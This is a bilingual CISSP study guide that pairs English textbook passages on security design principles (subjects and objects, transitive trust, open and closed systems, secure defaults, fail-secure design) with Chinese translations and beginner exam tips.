Programmers, developers, engineers, and so on should strive to build security into every application or system they develop, with greater levels of security provided to critical applications and those that process sensitive information. It's imperative to consider the security implications of a development project in the early stages because it's much easier to build security into a system during development than adding security to an existing system. Developers should research, implement, and manage engineering processes using secure design principles. Objects and Subjects Controlling access to any resource in a secure system involves two entities.

The subject is the active entity that requests access to a resource. A subject is commonly a user, but it can also be a process, program, computer, or

中文直译 / 整理

理解安全解决方案背后的理念有助于缩小对满足特定安全需求的最佳控制措 施的搜索范围。 本章将讨论安全系统设计原则、安全模型、通用准则以及信 息系统的安全能力。 第3域包含其他章节中讨论的各种主题,包括以下内容: 第1章,“通过原则与策略实现安全治理” 第6章,“密码学与对称密钥算法” 第7章,“PKI与密码学应用” 第8章,“安全模型、设计与能力的原则” 第9章,“安全漏洞、威胁与对策” 第10章,“物理安全要求” 第14章,“访问控制与监控” 第16章,“安全管理运营” 第20章,“软件开发安全” 第21章,“恶意代码与应用程序攻击” 安全设计原则 安全应贯穿系统开发的每个阶段。 程序员、开发人员、工程师等应努力在他们 开发的每个应用程序或系统中内置安全性,并为关键应用程序以及处理敏感信 息的系统提供更高水平的安全性。 在开发项目的早期阶段考虑安全影响至关重 要,因为在开发过程中将安全性融入系统远比在现有系统中添加安全性容易得 多。 开发人员应研究、实施和管理采用安全设计原则的工程流程。 对象与主体 在安全系统中控制对任何资源的访问涉及两个实体。 主体是请求访问资源的主 动实体。

主体通常是一个用户,但也可能是进程、程序、计算机或

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

程序:程序是一步一步怎么做。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 03 / PDF P489

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

organization. The object is the passive entity that the subject wants to access. An object is commonly a resource, such as a file or printer, but it can also be a user, process, program, computer, or organization. You want to keep a broad understanding of the terms subject and object, rather than only considering users and files. Access is the relationship between a subject and object, including reading, writing, modifying, deleting, printing, moving, backing up, and many other operations or activities. Authorization or access control is the management of the relationship between subjects and objects.

Remember that the actual entities referenced by the terms subject and object are specific to an individual access request. The entity serving as the object in one access event could serve as the subject in another. For example, process A may ask for data from process B. To satisfy process A's request, process B must ask for data from process C. In this example (Table 8.1), process B is the object of the first request and the subject of the second request. TABLE 8.1 Subjects and objects Request Subject Object First request Process AProcess B Second request Process BProcess C This also serves as an example of transitive trust.

Transitive trust is the concept that if A trusts B and B trusts C, then A inherits the trust of C through the transitive property (Figure 8.1)—which works as it would in a mathematical equation: if a = b and b = c, then a = c. In the previous example, when A requests data from B and then B requests data from C, the data that A receives is essentially from C. Transitive trust is a serious security concern because it may enable the bypassing of restrictions or limitations between A and C, especially if A and C both support interaction with B. An example would be when an organization blocks access to Facebook or YouTube to increase worker productivity.

Thus, workers (A) do not have access to certain Internet sites (C). However, if workers are able to have access to a web proxy, virtual private network (VPN), or anonymization service, then this can serve as a means to bypass the local network restriction. In other words, if workers (A) are accessing VPN service (B), and the VPN service (B) can access the blocked internet service (C), then A can access C through B via a transitive trust exploitation.

中文直译 / 整理

组织。 客体是主体希望访问的被动实体。 客体通常是一个资源,例如文件或打 印机,但也可能是用户、进程、程序、计算机或组织。 您需要对“主体”和 “客体”这两个术语保持广泛的理解,而不仅仅是将它们视为用户和文件。 访 问是主体与客体之间的关系,包括读取、写入、修改、删除、打印、移动、备 份以及许多其他操作或活动。 授权或访问控制是对主体与客体之间关系的管理。 请记住,术语 主体 和 客体所引用的实际实体是特定于单个访问请求的。 在一 个访问事件中作为客体的实体,可能在另一个事件中作为主体。 例如,进程 A 可能请求来自进程 B 的数据。 为满足进程 A 的请求,进程 B 必须请求来自进程 C 的数据。 在此示例中(表 8.1 ),进程 B 是第一个请求的客体,也是第二个 请求的主体。 表 8.1 主体和客体 请求 主体 客体 第一次请求 进程 A 进程 B 第二次请求 进程B 进程C 这同样是一个传递信任的示例。 传递信任是指如果A信任B,且B信任C,则A通 过传递性质继承对C的信任(图8.1)——其原理与数学方程相同:若a = b,且 b = c,则a = c。

在前述示例中,当A从B请求数据,而B又从C请求数据时,A 最终接收的数据本质上来自C。 传递信任是一个严重的安全问题,因为它可能允 许绕过A与C之间的限制或限制,尤其是在A和C都支持与B交互的情况下。 例如, 当一个组织阻止访问Facebook或YouTube以提高员工工作效率时,员工(A) 便无法访问某些网站(C)。 然而,如果员工能够使用网络代理、虚拟专用网络 (VPN)或匿名服务,则这些服务可成为绕过本地网络限制的手段。 换句话说, 如果员工(A)正在访问VPN服务(B),而VPN服务(B)能够访问被屏蔽的 互联网服务(C),那么A便可借助B通过传递信任的利用访问C。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 04 / PDF P490

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

FIGURE 8.1 Transitive trust Closed and Open Systems Systems are designed and built according to one of two differing philosophies. A closed system is designed to work well with a narrow range of other systems, generally all from the same manufacturer. The standards for closed systems are often proprietary and not normally disclosed. Open systems, on the other hand, are designed using agreed-on industry standards. Open systems are much easier to integrate with systems from different manufacturers that support the same standards or that use compatible application programming interfaces (APIs).

An API is a defined set of interactions allowed between computing elements, such as applications, services, networking, firmware, and hardware. An API defines the types of requests that can be made, the exact means to make the requests, the data forms of the exchange, and other related requirements (such as authentication and/or session encryption). APIs make interoperability of computing elements possible. Without APIs, computing components would be unable to interact directly, and information sharing would not be easy. APIs are what make modern computing and the Internet possible.

The app on your smartphone talks to the phone's operating system via an API; the phone's operating system talks over the telco or Wi-Fi network via an API to reach the cloud service's API to submit a request and receive a response.

中文直译 / 整理

图 8.1传递性信任 封闭系统和开放系统 系统的设计和构建遵循两种不同的理念。 封闭系统旨在与有限范围的其他系统 良好协作,通常这些系统均来自同一制造商。 封闭系统的标准通常是专有的, 且通常不对外公开。 开放系统则基于业界公认的标准化规范进行设计。 开放系 统更容易与支持相同标准或使用兼容应用程序编程接口(API)的其他制造商系 统集成。 API 是计算元素(如应用程序、服务、网络、固件和硬件)之间允许的一组定 义好的交互。 API 定义了可以发出的请求类型、发出请求的确切方式、数据交 换的格式以及其他相关要求(如身份验证和/或会话加密)。 API 使计算元素 之间的互操作性成为可能。 没有 API,计算组件将无法直接交互,信息共享也 将变得困难。 API 是现代计算和互联网得以实现的基础。 您智能手机上的应用 程序通过 API 与手机的操作系统通信; 手机的操作系统通过 API 经过电信或 Wi‑Fi 网络连接到云服务的 API,以提交请求并接收响应。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 05 / PDF P491

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Closed systems are harder to integrate with unlike systems, but this “feature” could make them more secure. A closed system is often composed of proprietary hardware and software that does not incorporate industry standards or offer an open API. This lack of integration ease means that attacks that typically focus on generic system components either will not work or must be customized to be successful. In many cases, attacking a closed system is harder than launching an attack on an open system, since a unique exploit of a unique vulnerability would be required.

In addition to the lack of known vulnerable components on a closed system, it is often necessary to possess more in-depth knowledge of the specific target system to launch a successful attack. Open systems are generally far easier to integrate with other open systems. It is easy, for example, to create a local area network (LAN) with a Microsoft Windows Server machine, a Linux machine, and a Macintosh machine. Although all three computers use different operating systems and could represent up to three different hardware architectures, each supports industry standards and open APIs, which makes it easy for network (or other) communications to occur.

This ease of interoperability comes at a price, however. Because standard communications components are incorporated into each of these three open systems, there are far more predictable entry points and methods for launching attacks. In general, their openness makes them more vulnerable to attack, and their widespread availability makes it possible for attackers to find plenty of potential targets. Also, open systems are more popular and widely deployed than closed systems and thus attract more attention from attackers. An attacker who develops basic attacking skills will find more targets that are open systems than closed ones.

Inarguably, there's a greater body of shared experience and knowledge on how to attack open systems than there is for closed systems. The security of an open system is therefore more dependent on the use of secure and defensive coding practices and a thoughtful defense-in-depth deployment strategy (see Chapter 1).

中文直译 / 整理

封闭系统难以与其他系统集成,但这种“特性”可能使其更加安全。 封闭系统 通常由专有硬件和软件组成,不采用行业标准,也不提供开放的 API。 这种集 成难度意味着,通常针对通用系统组件的攻击要么无法生效,要么必须进行定 制才能成功。 在许多情况下,攻击封闭系统比攻击开放系统更困难,因为需要 针对独特的漏洞开发独特的利用方法。 除了封闭系统中缺乏已知的易受攻击组 件外,要成功发起攻击,通常还需要对特定目标系统有更深入的了解。 开放系统通常更容易与其他开放系统集成。 例如,使用一台 Microsoft Windows Server 机器、一台 Linux 机器和一台 Macintosh 机器创建局域网 (LAN)非常容易。 尽管这三台计算机使用不同的操作系统,可能代表三种不 同的硬件架构,但它们都支持行业标准和开放 API,从而使网络(或其他)通 信变得容易。 然而,这种互操作性的便利是有代价的。 由于标准通信组件被纳 入这三个开放系统中,因此存在更多可预测的攻击入口和方法。 总体而言,它 们的开放性使其更容易受到攻击,而它们的广泛可用性使得攻击者能够找到大 量潜在目标。

此外,开放系统比封闭系统更流行、部署更广泛,因此更容易吸 引攻击者的关注。 一个具备基本攻击技能的攻击者会发现更多的开放系统目标, 而非封闭系统目标。 毫无疑问,关于如何攻击开放系统的共享经验和知识远多 于封闭系统。 因此,开放系统的安全性更依赖于安全和防御性的编码实践以及 深思熟虑的纵深防御部署策略(参见第 1 章)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

标准:标准给出必须满足的最低要求。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

多层控制串联、避免单点失败,就是 defense in depth。

Minimum level、mandatory requirement 常对应 standard。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 06 / PDF P492

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Open Source vs. Closed Source It's also helpful to keep in mind the distinction between open-source and closed-source systems. An open-source solution is one where the source code, and other internal logic, is exposed to the public. A closed-source solution is one where the source code and other internal logic is hidden from the public. Open-source solutions often depend on public inspection and review to improve the product over time. Closed-source solutions are more dependent on the vendor/programmer to revise the product over time. Both open-source and closed-source solutions can be available for sale or at no charge, but the term commercial typically implies closedsource.

However, closed-source code is sometimes revealed through either vendor compromise or through decompiling or disassembly. The former is always a breach of ethics and often the law, whereas the latter is a standard element in ethical reverse engineering or systems analysis. It is also the case that a closed-source program can be either an open system or a closed system, and an open-source program can be either an open system or a closed system. Since these terms are so similar, it is essential to read questions carefully.

Additional coverage of open-source and other software issues is included in Chapter 20, “Software Development Security.” CISSP Objective 3.1 lists 11 secure design principles. Six of them are covered in this chapter (i.e., secure defaults, fail securely, keep it simple and small, zero trust or trust but verify, privacy by design, and secure access service edge); the other five are covered in other chapters where they integrate best with broader coverage of similar topics. For threat modeling and defense in depth, see Chapter 1; for least privilege and segregation of duties, see Chapter 16; and for shared responsibility, see Chapter 9.

Secure Defaults You have probably heard the phrase “the tyranny of the default.” But do you know what this means? Tyranny has several definitions, but the one that

中文直译 / 整理

开源与闭源 同时,记住开放源代码与封闭源代码系统之间的区别也很有帮助。 开放源 代码解决方案是指源代码和其他内部逻辑向公众公开的方案。 封闭源代码 解决方案则是指源代码和其他内部逻辑对公众隐藏的方案。 开放源代码解 决方案通常依赖公众的检查和审查来逐步改进产品。 封闭源代码解决方案 则更依赖供应商/程序员来持续改进产品。 开放源代码和封闭源代码解决方 案都可以出售或免费提供,但术语商业通常意味着封闭源代码。 然而,封 闭源代码有时会通过供应商被攻破、反编译或反汇编而泄露。 前者总是违 反道德,且常常违法,而后者则是道德逆向工程或系统分析中的标准环节。 闭源程序既可以是开放系统,也可以是封闭系统; 开源程序同样既可以是 开放系统,也可以是封闭系统。 由于这些术语非常相似,因此必须仔细阅 读问题。 有关开源及其他软件问题的更多内容见第20章,“软件开发安全。 ” CISSP 目标 3.1 列出了 11 项安全设计原则。 其中六项在本章中进行了 介绍(即默认安全、安全失败、保持简洁与小型化、零信任或信任但验证、 设计即隐私、安全访问服务边缘); 其余五项则在其他章节中结合更广泛的 类似主题进行介绍。

有关威胁建模和纵深防御,请参见第1章; 有关最小权 限和职责分离,请参见第16章; 有关共享责任,请参见第9章。 默认安全 你可能听说过“默认的暴政”这个说法。 但你知道它的含义吗? 暴政有多种定义, 但其中一种

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
日志 日志记录系统和用户活动,用于监控、审计和调查。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 07 / PDF P493

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

applies here is “a rigorous condition imposed by some outside agency or force” (attributed to American historian Dixon Wecter). Many assume that the settings present in a software or hardware product when it is first installed are optimal. This is based on the assumption that the designers and developers of a product know the most about that product, so the settings they made are likely the best ones. However, this assumption overlooks the fact that often, the default settings of a product are selected to minimize installation problems to avoid increased load on the technical support services.

For example, consider the fact that most devices have a default password, which minimizes the costs of support when installing or using the product for the first time. Unfortunately, default settings often make the discovery and exploitation of equipment trivial for attackers. Never assume that the default settings of any product are secure. They typically are not because secure settings would likely get in the way of existing business tasks or system operations. It is always up to the system's administrator and/or company security staff to alter a product's settings to comply with the organization's security policies.

Unless your organization hired the developer, that developer did not craft the code or choose settings specifically for your organization's use of their product. A much better assumption is that the default settings of a product are the worst possible options for your organization. Therefore, you need to review every setting to determine what it does and what you need configured to do to optimize security while supporting business operations. Fortunately, there is some movement toward more secure defaults. Some products, especially security products, may now be designed with their most secure settings enabled by default.

However, such a locked-down product will have fewer enabled capabilities and will likely be less user-friendly. Thus, while being more secure, secure defaults may be an obstacle for those who only want their systems to “just work.” If you are a developer, you must create detailed explanations of each of your product's configuration options. You can't assume that customers know everything about your product, especially the configuration settings and what each option does to alter its features, operations, communications, etc. You may be required to have default settings to make the product as easy to install as possible.

Still, you may be able to provide one or more configurations in either written instructional form or in a file that can be imported or applied.

中文直译 / 整理

您可能听说过“默认设置的暴政”这个说法。 但您知道这指的是什么吗? 暴政 有多种定义,其中适用于此处的是“由某种外部机构或力量强加的严格条件” (源自美国历史学家迪克森·韦克特)。 许多人认为,软件或硬件产品在首次 安装时的设置是最优的。 这是基于这样一种假设:产品的设计者和开发者最了 解该产品,因此他们设定的选项最有可能是最好的。 然而,这种假设忽视了一 个事实:通常,产品的默认设置是为了尽量减少安装问题,以避免增加技术支 持的负担。 例如,大多数设备都设有默认密码,这可以降低产品首次安装或使 用时的支持成本。 不幸的是,默认设置往往使攻击者能够轻易发现并利用设备。 绝不要假设任何产品的默认设置都是安全的。 它们通常并不安全,因为安全 设置可能会妨碍现有的业务任务或系统操作。 始终由系统的管理员和/或公司 安全人员修改产品的设置,以符合组织的安全策略。 除非您的组织聘请了该 开发者,否则该开发者并未专门为贵组织使用其产品而编写代码或选择设置。 一个更好的假设是,产品的默认设置对您的组织而言是最糟糕的选项。 因此, 您需要审查每一项设置,以确定其功能以及为在支持业务操作的同时优化安全 性而需要配置的内容。

幸运的是,目前正朝着更安全的默认设置方向发展。 一些产品,尤其是安全产 品,现在可能已设计为默认启用其最安全的设置。 然而,这种高度锁定的产品 将具有更少的启用功能,且可能用户体验较差。 因此,尽管更安全,安全的默 认设置可能成为那些仅希望系统“即开即用”的人的障碍。 如果您是开发者,您必须为产品的每个配置选项提供详细的说明。 您不能假设 客户了解您产品的所有信息,尤其是配置设置以及每个选项如何更改其功能、 操作、通信等。 您可能需要设置默认配置,以使产品尽可能易于安装。 但您仍 可通过书面说明或可导入或应用的文件提供一种或多种配置。

小白解释

场景先行:你是公司的安全负责人,正在读第 493 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 08 / PDF P494

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

This will go a long way to assist customers with gaining the most advantage from your product while minimizing the security risks. Restrictive defaults refer to a practice or policy where the default settings or options are intentionally configured to be more limiting or restrictive to enhance security, privacy, or compliance. This concept is often applied in software, systems, or services where administrators or users are provided with a preconfigured set of options and the default settings prioritize security, safety, or regulatory compliance. Fail Securely System failures can occur due to a wide range of causes.

Once the failure event occurs, how the system or environment handles the failure is important. The most desired result is for an application to fail securely. The first type of failure management is programmatic error handling (aka exception handling). This is the process where a programmer codes in mechanisms to anticipate and defend against errors to avoid the termination of execution. Error handling includes code that will attempt to handle errors when they arise before they can cause harm or interrupt execution. One such mechanism, supported by many languages, is a try..catch statement.

This logical block statement is used to place code that could result in an error on the try branch and then code that will be executed if there is an error on the catch branch. This is similar to if..then..else statements, but it is designed to handle errors deftly. Other mechanisms are to avoid or prevent errors, especially regarding user input. Input sanitization, input filtering, and input validation are terms used to refer to this concept. This often includes checking the input for length, filtering against a block list of unwanted input, and escaping metacharacters. See more about secure coding practices in Chapter 9; Chapter 15, “Security Assessment and Testing”; and Chapter 20.

There are several similar terms that can be confusing and thus require a bit of focus to comprehend. These terms are fail-soft, fail-secure, fail-safe, failopen, and fail-closed. Typically, confusion occurs when not understanding the context where these terms are used. The two primary contexts are the

中文直译 / 整理

这将极大地帮助客户最大限度地利用您的产品,同时降低安全风险。 限制性默认值是指一种实践或策略,其中默认设置或选项被有意配置 为更具限制性,以增强安全性、隐私性或合规性。 这一概念通常应用于软 件、系统或服务中,管理员或用户会获得一组预配置的选项,而默认设置 优先考虑安全性、安全性或监管合规性。 安全失败 系统故障可能由多种原因引起。 一旦故障事件发生,系统或环境如何处理该故 障就显得至关重要。 最理想的结果是应用程序安全失败。 第一种故障管理方式 是编程错误处理(即异常处理)。 这是一种程序员编写机制以预测和防范错误, 从而避免执行终止的过程。 错误处理包括在错误发生时尝试处理它们的代码, 以防止其造成损害或中断执行。 一种被许多语言支持的机制是try..catch语句。 这种逻辑块语句用于将可能引 发错误的代码放在try分支中,而将发生错误时要执行的代码放在catch分支中。 这与if..then..else语句类似,但专为灵活处理错误而设计。 其他机制用于避免或防止错误,特别是与用户输入相关的错误。 输入清理、输 入过滤和输入验证是用于指代这一概念的术语。

这通常包括检查输入的长度、 根据不希望的输入黑名单进行过滤,以及转义元字符。 有关安全编码实践的更 多信息,请参见第9章; 第15章,“安全评估与测试”; 以及第20章。 有几个相似的术语容易引起混淆,因此需要集中注意力来理解。 这些术语包括 失效柔化、失效安全、失效保护、失效开放和失效关闭。 通常,混淆源于对这 些术语使用情境的不了解。 两个主要的情境是

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P495

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

physical world and the digital environment. In the physical world, entities primarily prioritize the protection of people. However, there are some circumstances where assets are protected in priority over people. In the digital world, entities focus on protecting assets, but the type of protection may vary among the CIA Triad. When a program fails securely, it is able to do so only because it was designed and programmed to. When secure failure is integrated into a system, the designer must make a few difficult choices about what the results of a failure event will be. The first question to be resolved is whether the system can operate in a fail-soft mode.

To fail-soft is to allow a system to continue to operate after a component fails. This is an alternative to having a failure cause a complete system failure. An example is a typical multitasking operating system that can support numerous simultaneous applications. If one application fails, the others can typically continue to operate. If fail-soft isn't a viable option, then the designer needs to consider the type of product, its deployment scenarios, and the priorities related to failure response. In other words, when the product fails without a fail-soft design, it will fail completely.

